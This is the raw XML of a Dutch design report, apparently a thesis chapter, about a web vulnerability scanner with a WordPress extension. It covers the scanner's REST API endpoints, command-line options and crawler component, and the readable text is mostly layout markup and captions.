                <wp:docPr id="788" name="Text Box 788"/>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9FE52" w14:textId="602B7EA7" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0075098B">
                            <w:r>
                              <w:t>Figuur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2914E" id="Text Box 788" o:spid="_x0000_s1096" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16pt;margin-top:306.45pt;width:70pt;height:27.4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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5B79FE52" w14:textId="602B7EA7" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0075098B">
                      <w:r>
                        <w:t>Figuur 4.8</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253202432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28EF06FE" wp14:editId="2604F08C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-203200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>687070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="787" name="Text Box 787"/>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45261" w14:textId="0ACC1AC6" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0075098B">
                            <w:r>
                              <w:t>Figuur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F06FE" id="Text Box 787" o:spid="_x0000_s1097" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16pt;margin-top:54.1pt;width:70pt;height:27.4pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5D245261" w14:textId="0ACC1AC6" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0075098B">
                      <w:r>
                        <w:t>Figuur 4.7</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E2204E" w:rsidRDefault="00E2204E">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98"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5D6B393A" w14:textId="68376A43" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Link naar pdf</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E2204E" w:rsidRDefault="00E2204E">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99"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="65A4E89C" w14:textId="5129A8E2" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Knop waarmee een rapport nogmaals verzonden kan worden</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A4DC"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23077"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2793F"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756B"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E2204E" w:rsidRDefault="00E2204E">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100"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6R1XkCAABk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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6CFED3A3" w14:textId="64607578" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Admi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E2204E" w:rsidRDefault="00E2204E">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101"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22VXsCAABkBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI21G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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2BD6A130" w14:textId="0ABFD960" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">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102"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="703E66CB" w14:textId="057568E4" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E"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103"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="67CF69F4" w14:textId="7C50A985" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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241096">
          <w:headerReference w:type="first" r:id="rId56"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0657A02B" w14:textId="5F24B0F8" w:rsidR="00C05EA7" w:rsidRDefault="00414956" w:rsidP="00414956">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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8F2F4"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p>
    <w:p w14:paraId="11714C9E" w14:textId="0BDB1CAF" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00817EEE">
      <w:r>
        <w:t>De API zorgt voor de communicatie tussen de WordPress extensie en de webapplicatie scanner en is van de type REST API. REST API’s communiceren over HTTP en gebruiken hierbij de HTTP werkwoorden zoals GET en POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42950857" w14:textId="7E10CCB5" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00817EEE">
      <w:r>
        <w:t>In het vorige hoofdstuk werden de schermen van de WordPress extensie behandeld, hierin werd de workflow van de extensie uitgelegd. Van het registreren tot het aanvragen van een scan de WordPress extensie roept voor elke handeling die aan de kant van de webapplicatie scanner uitgevoerd moet worden aan via de API, maar ook de admin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r>
              <w:t>WordPress</w:t>
            </w:r>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request_scan</w:t>
            </w:r>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r>
              <w:t>WordPress</w:t>
            </w:r>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r w:rsidRPr="00C3239B">
              <w:rPr>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
              </w:rPr>
              <w:t>register_customer</w:t>
            </w:r>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r>
              <w:t>WordPress</w:t>
            </w:r>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auth</w:t>
            </w:r>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r>
              <w:t>Admin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admin</w:t>
            </w:r>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Admin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r>
              <w:t>Admin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customers</w:t>
            </w:r>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r>
              <w:t>Admin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reports</w:t>
            </w:r>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r>
              <w:t>Admin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active</w:t>
            </w:r>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r>
              <w:t>Admin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send{id}</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FA6A48E" w:rsidR="00FE2D29" w:rsidRDefault="0075098B" w:rsidP="00817EEE">
      <w:r>
        <w:t>Tabel 4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2554B8" w14:textId="6482893B" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00817EEE">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2C57B5" w14:textId="1F9812FD"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C9ECF"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7C31D086"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 xml:space="preserve">doorzoekt de broncode van een website naar specifieke HTML DOM Elementen,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SQLi en XSS kwetsbaarheden. </w:t>
      </w:r>
      <w:r w:rsidR="00E82AEF">
        <w:t>De geïdentificeerde kwetsbaarheden worden op een formele wijze gedocumenteerd in het rapport met gedetailleerde informatie over het doelwit en advies over welke vervolg stappen de klant kan nemen. Het rapport wo</w:t>
      </w:r>
      <w:r w:rsidR="004514E0">
        <w:t>rdt in PDF formaat gegenereerd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E396E" w14:textId="5AF9F738" w:rsidR="00DD7A64" w:rsidRDefault="00DD7A64" w:rsidP="006E3A79"/>
    <w:p w14:paraId="1DA4EE4E" w14:textId="3A39741B" w:rsidR="00AF6968" w:rsidRDefault="00AF6968">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D4547" w14:textId="1635CAF2" w:rsidR="00423183" w:rsidRPr="0011438E" w:rsidRDefault="00AF6968" w:rsidP="00B61721">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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29C25"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r w:rsidR="00423183">
        <w:t>Command Line Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C8746" w14:textId="21CCFEFF" w:rsidR="00F42980" w:rsidRDefault="00F42980"/>
    <w:p w14:paraId="34CFAF0B" w14:textId="4C8CCABE" w:rsidR="0017411E" w:rsidRDefault="00F42980">
      <w:r>
        <w:t>SecurityRaport maakt gebruik van een Command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E2204E" w:rsidRPr="008840AF" w:rsidRDefault="00E2204E">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104"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6DB11C20" w14:textId="6A4A826C" w:rsidR="00E2204E" w:rsidRPr="008840AF" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="00296464" w:rsidRDefault="00E2204E">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105"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4FBD9467" w14:textId="3BCBB321" w:rsidR="00E2204E" w:rsidRPr="00296464" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="00296464" w:rsidRDefault="00E2204E">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106"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15094E2E" w14:textId="54EF43DD" w:rsidR="00E2204E" w:rsidRPr="00296464" w:rsidRDefault="00E2204E">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r>
              <w:t>bs</w:t>
            </w:r>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r>
              <w:t>s</w:t>
            </w:r>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r>
              <w:t>x</w:t>
            </w:r>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r>
              <w:t>h</w:t>
            </w:r>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r>
              <w:t>rt</w:t>
            </w:r>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r>
              <w:t>r</w:t>
            </w:r>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r>
              <w:t>fm</w:t>
            </w:r>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25EE840D" w:rsidR="00F1151B" w:rsidRDefault="008A368B">
      <w:r>
        <w:t>Tabel 4.3</w:t>
      </w:r>
    </w:p>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E2204E" w:rsidRPr="00656854" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00656854">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>options</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="78888A1C" w14:textId="65A81046" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-bs</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="654D8F72" w14:textId="7B8536C7" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-s</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="66EB06A0" w14:textId="409358F8" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-x</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3C0524F4" w14:textId="6FC8F27D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-h</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0F5CC51B" w14:textId="5AFD2553" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-rt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D230BD4" w14:textId="584AB04D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-r</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="158EF061" w14:textId="445A65B8" w:rsidR="00E2204E" w:rsidRPr="00D96E56" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>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107"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1D95E77D" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00656854" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00656854">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>options</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="78888A1C" w14:textId="65A81046" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-bs</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="654D8F72" w14:textId="7B8536C7" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-s</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="66EB06A0" w14:textId="409358F8" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-x</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3C0524F4" w14:textId="6FC8F27D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-h</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0F5CC51B" w14:textId="5AFD2553" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-rt</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6D230BD4" w14:textId="584AB04D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-r</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="158EF061" w14:textId="445A65B8" w:rsidR="00E2204E" w:rsidRPr="00D96E56" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-fm</w:t>
                      </w:r>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E2204E" w:rsidRPr="006B2D29" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>sca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108"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3F6C0BEC" w14:textId="0CC4F184" w:rsidR="00E2204E" w:rsidRPr="006B2D29" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>scan url</w:t>
                      </w:r>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AC3D"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E2204E" w:rsidRPr="006D73EA" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="006D73EA">
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>/request_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109"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8AnkCAABkBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI21E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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="70DDCEC7" w14:textId="46A9EE2C" w:rsidR="00E2204E" w:rsidRPr="006D73EA" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="006D73EA">
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>/request_scan</w:t>
                      </w:r>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39FC2"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3370"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E2204E" w:rsidRPr="009A3D6F" w:rsidRDefault="00E2204E">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110"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IutQ8XkCAABkBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAac91Ad4AAAAIAQAA&#10;DwAAAAAAAAAAAAAAAADRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1DEC9FA5" w14:textId="4D085A4D" w:rsidR="00E2204E" w:rsidRPr="009A3D6F" w:rsidRDefault="00E2204E">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0F704"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E2204E" w:rsidRPr="009A3D6F" w:rsidRDefault="00E2204E">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111"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HIWZt4oCAACQBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAC7CrdtwAAAAIAQAADwAAAAAAAAAAAAAAAADiBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7D7B4501" w14:textId="0EBEBCA7" w:rsidR="00E2204E" w:rsidRPr="009A3D6F" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="009A3D6F" w:rsidRDefault="00E2204E">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112"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="162BA211" w14:textId="4D85B169" w:rsidR="00E2204E" w:rsidRPr="009A3D6F" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Full scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="155CAC7B" w14:textId="1B218611" w:rsidR="00E2204E" w:rsidRPr="0022016D" w:rsidRDefault="00E2204E">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113"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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="09172301" w14:textId="1F51AB33" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Full scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="155CAC7B" w14:textId="1B218611" w:rsidR="00E2204E" w:rsidRPr="0022016D" w:rsidRDefault="00E2204E">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438B4"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623FE"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4432D2">
          <w:headerReference w:type="default" r:id="rId59"/>
          <w:footerReference w:type="default" r:id="rId60"/>
          <w:headerReference w:type="first" r:id="rId61"/>
          <w:footerReference w:type="first" r:id="rId62"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C905DA" w14:textId="758D0511" w:rsidR="006E3A79" w:rsidRDefault="00087E52" w:rsidP="00B61721">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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9810"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r w:rsidR="006E3A79" w:rsidRPr="003D45FB">
        <w:t>Crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2259322F" w14:textId="3E710319" w:rsidR="00470AEB" w:rsidRPr="00470AEB" w:rsidRDefault="00470AEB" w:rsidP="00470AEB"/>
    <w:p w14:paraId="2A7FABF4" w14:textId="77777777" w:rsidR="0018514B"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E2204E" w:rsidRPr="00FA2A0D" w:rsidRDefault="00E2204E">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114"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Q9oTDY0CAACNBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEAuRgH+eIAAAALAQAADwAAAAAAAAAAAAAAAADlBAAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAPQFAAAAAA==&#10;" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0F17658E" w14:textId="7E734579" w:rsidR="00E2204E" w:rsidRPr="00FA2A0D" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="00C805F6" w:rsidRDefault="00E2204E">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115"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NjC97yMAgAAjQUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAM1SzWrhAAAACwEAAA8AAAAAAAAAAAAAAAAA5AQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4CED1145" w14:textId="0B191AD0" w:rsidR="00E2204E" w:rsidRPr="00C805F6" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="00C805F6" w:rsidRDefault="00E2204E">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16"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DO4GCejAIAAI0FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQCyRbBS4gAAAAsBAAAPAAAAAAAAAAAAAAAAAOQEAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAA8wUAAAAA&#10;" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="77B18ECE" w14:textId="0B436850" w:rsidR="00E2204E" w:rsidRPr="00C805F6" w:rsidRDefault="00E2204E">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79F0F"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E3CC4"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E2204E" w:rsidRPr="00E221BC" w:rsidRDefault="00E2204E">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17"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" fillcolor="#ffd966 [1943]" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1E4B0152" w14:textId="7EB22096" w:rsidR="00E2204E" w:rsidRPr="00E221BC" w:rsidRDefault="00E2204E">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FCBF3"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6AD10"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0B040"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E517"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De Crawler behoort tot</w:t>
      </w:r>
      <w:r w:rsidR="00CA05E0">
        <w:t xml:space="preserve"> één van</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t xml:space="preserve"> de kern componenten van een webapplicatie scanner en maakt deel uit van het projectstructuur.</w:t>
      </w:r>
      <w:r w:rsidR="000107FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>De term “Crawling” is synoniem worden met de activiteit waarbij data van een website programmatisch wordt verkregen. De Crawler voorziet de webapplicatie scanner van informatie over de website, dit maakt deze component een essentieel onderdeel van het gehele systeem. Het is simpel om informatie te verkrijgen over een website, hiervoor dien je geen Crawler te implementeren, een simpele HTTP request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URL links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Wat de Crawler vervolgens doet is de data opslaan in een</w:t>
      </w:r>
      <w:r w:rsidR="005041A4">
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0248D387" w14:textId="77777777" w:rsidR="0018514B" w:rsidRDefault="0018514B" w:rsidP="001B3C7D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE7A28E" w14:textId="77777777" w:rsidR="0018514B" w:rsidRDefault="0018514B" w:rsidP="001B3C7D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B099C4B" w14:textId="5DE61BD4" w:rsidR="00681EF4" w:rsidRPr="001B3C7D" w:rsidRDefault="00421E81" w:rsidP="001B3C7D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.9</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Figuur 4.10</w:t>
      </w:r>
      <w:r w:rsidR="0034078F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="509FE9CF" w14:textId="20C927A3" w:rsidR="00D84BAC" w:rsidRDefault="00565811"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7F03A"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De Crawler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r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Omschrijving</w:t>
            </w:r>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Website configuratie</w:t>
            </w:r>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Parameters van een Hyperlink</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7276470F" w14:textId="1AC5CE44" w:rsidR="002D6A29" w:rsidRDefault="00586B42" w:rsidP="003E2704">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91E301" w14:textId="3253715F" w:rsidR="002D6A29" w:rsidRDefault="002D6A29" w:rsidP="003E2704"/>
    <w:p w14:paraId="11EABB38" w14:textId="77777777" w:rsidR="00091C97" w:rsidRDefault="00091C97" w:rsidP="003E2704">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747E429F" w14:textId="3EBC27DC" w:rsidR="00421E81" w:rsidRDefault="00421E81" w:rsidP="003E2704">
      <w:r>
        <w:t xml:space="preserve"> Tabel 4.4</w:t>
      </w:r>
    </w:p>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4E7EE49">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-6985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>16319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E2204E" w:rsidRPr="00DC482B" w:rsidRDefault="00E2204E">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18" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.55pt;margin-top:12.8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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7BCD7439" w14:textId="1B5E900A" w:rsidR="00E2204E" w:rsidRPr="00DC482B" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="00DC482B" w:rsidRDefault="00E2204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contextualSpacing/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20970145" w14:textId="77777777" w:rsidR="00863E52" w:rsidRDefault="00863E52" w:rsidP="00681EF4">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
        </w:rPr>
